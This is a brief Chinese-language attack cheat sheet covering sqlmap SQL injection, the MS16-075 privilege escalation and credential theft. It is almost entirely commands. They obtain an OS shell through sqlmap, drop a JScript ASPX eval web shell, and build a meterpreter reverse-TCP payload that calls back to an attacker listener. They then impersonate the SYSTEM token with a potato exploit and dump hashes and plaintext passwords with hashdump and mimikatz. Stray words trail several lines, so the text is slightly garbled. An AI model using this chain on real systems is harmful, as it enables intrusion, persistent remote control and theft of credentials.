sqlmap注入及ms16-075提權總結sql
(1)sqlmap執行命令shell
sqlmap.py -r 1**.***.***.***.txtwindows
sqlmap.py -r 1**.***.***.***.txt --is-dbtcp
sqlmap.py -r 1**.***.***.***.txt --password --batchide
sqlmap.py -r 1**.***.***.***.txt --os-shell測試
(2)os-shell下執行命令ui
ipconfigthis
dir c:/url
echo "thisis test">e:\software\AMS_NoFlow\t.txt命令行
echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > e:\software\AMS_NoFlow\cmd.aspx
(3)msf下執行命令
生成反彈×××:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=4433 -f exe -o 4433.exe
(4)msf啓動及監聽
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33(實際爲外網IP地址)
set LPORT 4433
exploit
(5)ms16-075提權命令
use incognito
list_tokens -u
execute -cH -f ./potato.exe
list_tokens -u
impersonate_token "NT AUTHORITY\\SYSTEM"
getuid
(6)獲取密碼
run hashdump
(7)mimikatz進行密碼獲取
load mimikatz
kerberos、livessp、msv、ssp、tspkg、wdigest(逐個命令測試,有的會顯示明文密碼)
mimikatz_command:mimikatz命令提示窗口
(8)mimikatz命令行下獲取密碼(未作測試)
privilege::debug
sekurlsa::logonpasswords